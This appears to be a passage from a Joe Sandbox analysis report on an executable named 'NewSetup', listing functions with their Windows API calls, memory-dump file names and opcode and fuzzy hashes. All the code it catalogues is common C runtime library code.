                                                                                                      Function 0022D1BD Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 002280E1: EnterCriticalSection.KERNEL32(?,?,0022C5F8,?,00249290,00000008,0022C4EA,?,?,?), ref: 002280F0
                                                                                                      • EnumSystemLocalesW.KERNEL32(0022D1B0,00000001,00249310,0000000C,0022CB11,-00000050), ref: 0022D1F5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 1272433827-0
                                                                                                      • Opcode ID: e4be77a4c8a2c5d2c0e10a663e28735e6859cbc16d0234df473c23cd94476f8c
                                                                                                      • Instruction ID: d15a3145f00054c8aac4a3042477bebdac4c9855d92aa5eb7689ed10de069f70
                                                                                                      • Opcode Fuzzy Hash: e4be77a4c8a2c5d2c0e10a663e28735e6859cbc16d0234df473c23cd94476f8c
                                                                                                      • Instruction Fuzzy Hash: 7EF04F76A10214EFDB10EFA8F846B9D7BF0FB06721F10816AF414972A1CB758950CF51
                                                                                                      Function 00231915 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0022C16A: GetLastError.KERNEL32(?,?,00225495,00248E38,0000000C), ref: 0022C16E
                                                                                                        • Part of subcall function 0022C16A: SetLastError.KERNEL32(00000000), ref: 0022C210
                                                                                                      • EnumSystemLocalesW.KERNEL32(00231960,00000001,?,?,?,00231385,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 0023194C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 2417226690-0
                                                                                                      • Opcode ID: 6f91e0983b652eb316311701b73782b79d6c9847c341da8ec2e537533be9a839
                                                                                                      • Instruction ID: 47cf235f41cc560395f63a437b6da354b50e68a91424140a1b60a60ac47e3596
                                                                                                      • Opcode Fuzzy Hash: 6f91e0983b652eb316311701b73782b79d6c9847c341da8ec2e537533be9a839
                                                                                                      • Instruction Fuzzy Hash: C2F0EC3931020557CB04AF35DC6976A7FA4EFC2B60F164059EA098B151C6719863C790
                                                                                                      Function 0022CC15 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,00226E33,?,20001004,00000000,00000002,?,?,00225D3D), ref: 0022CC49
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale
                                                                                                      • String ID:
                                                                                                      • API String ID: 2299586839-0
                                                                                                      • Opcode ID: 6815045f13cc5f311d0cb15cf66f06985796a5c1ab72a85b03e24c4a70258f82
                                                                                                      • Instruction ID: acc0b90261754c21a68de99a91aada2e21a1e2187d9fe9325b31a644b162a5ea
                                                                                                      • Opcode Fuzzy Hash: 6815045f13cc5f311d0cb15cf66f06985796a5c1ab72a85b03e24c4a70258f82
                                                                                                      • Instruction Fuzzy Hash: 15E04F3651023CBBCF122FA0FD08E9E3E16EF45750F144022FD0566121CB769931AB95
                                                                                                      Function 0021F8DD Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0000FA00), ref: 0021F8E2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                      • String ID:
                                                                                                      • API String ID: 3192549508-0
                                                                                                      • Opcode ID: 5ee9f45805358a0e32c45ed41c7ec7c6ed155b3cee10d17017e99ee8e8cd5fc3
                                                                                                      • Instruction ID: f610d92fd0b79f2261d226b4703e90015a949816746041f5d924f991669fb2aa
                                                                                                      • Opcode Fuzzy Hash: 5ee9f45805358a0e32c45ed41c7ec7c6ed155b3cee10d17017e99ee8e8cd5fc3
                                                                                                      • Instruction Fuzzy Hash:
                                                                                                      Function 0022D8E0 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HeapProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 54951025-0
                                                                                                      • Opcode ID: 3676ca76f9d73775f3fd0f082b83ea42674adced5c4e2d7f067894623c8157a9
                                                                                                      • Instruction ID: 5311eeb4277a4e4543d8bc578373c093b0260da4e5a0a45fa7cc8a7c40a8b604
                                                                                                      • Opcode Fuzzy Hash: 3676ca76f9d73775f3fd0f082b83ea42674adced5c4e2d7f067894623c8157a9
                                                                                                      • Instruction Fuzzy Hash: 9FA011382002028F83008F32BA0C2083AA8AA03AC0300802AA802C20A0EA308008AF02
                                                                                                      Function 0023AAE2 Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetCPInfo.KERNEL32(03005EA0,03005EA0,00000000,7FFFFFFF,?,0023AACD,03005EA0,03005EA0,00000000,03005EA0,?,?,?,?,03005EA0,00000000), ref: 0023AB88
                                                                                                      • __alloca_probe_16.LIBCMT ref: 0023AC43
                                                                                                      • __alloca_probe_16.LIBCMT ref: 0023ACD2
                                                                                                      • __freea.LIBCMT ref: 0023AD1D
                                                                                                      • __freea.LIBCMT ref: 0023AD23
                                                                                                      • __freea.LIBCMT ref: 0023AD59
                                                                                                      • __freea.LIBCMT ref: 0023AD5F
                                                                                                      • __freea.LIBCMT ref: 0023AD6F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __freea$__alloca_probe_16$Info
                                                                                                      • String ID:
                                                                                                      • API String ID: 127012223-0
                                                                                                      • Opcode ID: e0b3d2d27e173046c6de87382c7fef21ec97912d1f08c6bdacc1799ccf0b37cc
                                                                                                      • Instruction ID: 7a5cefb00a04c6fd042b37d37fa4525399ef89b1fee7b6926023e32c171cd005
                                                                                                      • Opcode Fuzzy Hash: e0b3d2d27e173046c6de87382c7fef21ec97912d1f08c6bdacc1799ccf0b37cc
                                                                                                      • Instruction Fuzzy Hash: DE71E7B2A2020A6BDF219E648C41FEFB7BADF55314F290466F884A7191E775CC60CB52
                                                                                                      Function 0021FE29 Relevance: 12.2, APIs: 8, Instructions: 177COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 0021FE70
                                                                                                      • __alloca_probe_16.LIBCMT ref: 0021FE9C
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 0021FEDB
                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0021FEF8
                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0021FF37
                                                                                                      • __alloca_probe_16.LIBCMT ref: 0021FF54
                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0021FF96
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0021FFB9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                      • String ID:
                                                                                                      • API String ID: 2040435927-0
                                                                                                      • Opcode ID: 91eff6058527918cd29c689d7e4ed7930ffdc23d1b42afed78fcffce93657c5c
                                                                                                      • Instruction ID: fa9bf74597e8a0d97f2f4ec13a97494f83cdabb9b4c2c301b2e3505502742382
                                                                                                      • Opcode Fuzzy Hash: 91eff6058527918cd29c689d7e4ed7930ffdc23d1b42afed78fcffce93657c5c
                                                                                                      • Instruction Fuzzy Hash: E251A07262021AAFEB604F60CD49FEA7BE8EF62750F154435F924DA590D7B18CA18B50
                                                                                                      Function 0022EE76 Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _strrchr
                                                                                                      • String ID:
                                                                                                      • API String ID: 3213747228-0
                                                                                                      • Opcode ID: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
                                                                                                      • Instruction ID: 9500c5a6f05806044f6abd7b3a729b789b69422ca0e892039e2977a19dc507d9
                                                                                                      • Opcode Fuzzy Hash: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
                                                                                                      • Instruction Fuzzy Hash: 2FB13772A20366BFDF218FA4DD41BAE7BB5EF15310F154175E844AF282D2749D21CBA0
                                                                                                      Function 00220D40 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00220D77
                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00220D7F
                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00220E08
                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00220E33
                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00220E88
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 1170836740-1018135373
                                                                                                      • Opcode ID: d0aeec00e5d43686bf68b8ea2ba534efb51acbe42c73d91e0430398be8dc0bba
                                                                                                      • Instruction ID: 4d3318316a1b0e04de3c09c4cd12206ca94ada09b2067e026e4591d499587d5d
                                                                                                      • Opcode Fuzzy Hash: d0aeec00e5d43686bf68b8ea2ba534efb51acbe42c73d91e0430398be8dc0bba
                                                                                                      • Instruction Fuzzy Hash: 4B41F230A20229BBCF11DFA8E884A9EBBA6EF05314F158455E8146B393C731AD61CF90
                                                                                                      Function 00213C70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00213CA5
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00213CBF
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00213CE0
                                                                                                      • __Getctype.LIBCPMT ref: 00213D92
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00213DD8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$Getctype
                                                                                                      • String ID: e.$
                                                                                                      • API String ID: 3087743877-2253995300
                                                                                                      • Opcode ID: c98c4e7c1ff695148a3b2b66474d61b3e2525dd3f1ef15213b21af93635afc9a
                                                                                                      • Instruction ID: a2441f7eac25f9c8aac96be948cad35375c2aefc916c44f6c766b37f380f2123
                                                                                                      • Opcode Fuzzy Hash: c98c4e7c1ff695148a3b2b66474d61b3e2525dd3f1ef15213b21af93635afc9a
                                                                                                      • Instruction Fuzzy Hash: 9D4177B5E112158BCB10DF98E844BEABBF2BFA4720F148119D8156B391DB35AA90CF91
                                                                                                      Function 00220080 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 15libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00220086
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00220094
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 002200A5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                      • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                      • API String ID: 667068680-1047828073
                                                                                                      • Opcode ID: 5a800ae7c490712f883fed0b49dceacdd7b77fda7a6273b05685b17cecaae006
                                                                                                      • Instruction ID: 8fceee0cfdaf3c1705b08051bc96e4c1af7491eeadb142179e3f2bac567e779e
                                                                                                      • Opcode Fuzzy Hash: 5a800ae7c490712f883fed0b49dceacdd7b77fda7a6273b05685b17cecaae006
                                                                                                      • Instruction Fuzzy Hash: 0AD0C979562620AB8354AFF8FC4D98A3EB9FA0B7123024553F841D2360DFB486108B9A
                                                                                                      Function 00234F81 Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d1182ac39afb8ff0e343e8d2f5a5bdb0ebe4038d65f59ec5b8ff983426c4fc6b
                                                                                                      • Instruction ID: 13da66b86169384ea0065df5e7e8fdfdd5df5775139059c1dc43f2106f920927
                                                                                                      • Opcode Fuzzy Hash: d1182ac39afb8ff0e343e8d2f5a5bdb0ebe4038d65f59ec5b8ff983426c4fc6b
                                                                                                      • Instruction Fuzzy Hash: 60B13AF4E28666AFDB01CFA8D885BBE7BB4BF06300F144199E90957291C7719D61CF90
                                                                                                      Function 00219B30 Relevance: 9.1, APIs: 6, Instructions: 125COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00219C97
                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00219CA8
                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00219CBC
                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00219CDD
                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00219CEE
                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00219D06
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Cpp_errorThrow_std::_
                                                                                                      • String ID:
                                                                                                      • API String ID: 2134207285-0
                                                                                                      • Opcode ID: b5afe0aabec58d16ab43fc4a28ddf67d95b06c1d020bcbd0b9bfd5f1ac2090ea
                                                                                                      • Instruction ID: ec26ff9712bb04ebf6b99e97dee21df0dc24517e60e02aec0373de0a92863111
                                                                                                      • Opcode Fuzzy Hash: b5afe0aabec58d16ab43fc4a28ddf67d95b06c1d020bcbd0b9bfd5f1ac2090ea
                                                                                                      • Instruction Fuzzy Hash: 8A41C2B1910745CBDB309F6089117EFB7F4AF69324F18062ED9BA162D1D37165E0CB92
                                                                                                      Function 0022ACE7 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(?,?,0022ACDE,00220760,0021B77F,456001D6,?,?,?,?,0023BFCA,000000FF), ref: 0022ACF5
                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0022AD03
                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0022AD1C
                                                                                                      • SetLastError.KERNEL32(00000000,?,0022ACDE,00220760,0021B77F,456001D6,?,?,?,?,0023BFCA,000000FF), ref: 0022AD6E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
